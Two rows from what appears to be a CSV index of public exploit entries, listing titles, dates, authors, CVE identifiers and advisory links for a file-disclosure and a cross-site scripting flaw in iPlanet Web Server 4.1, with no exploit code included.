21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info

Can't render this file because it is too large.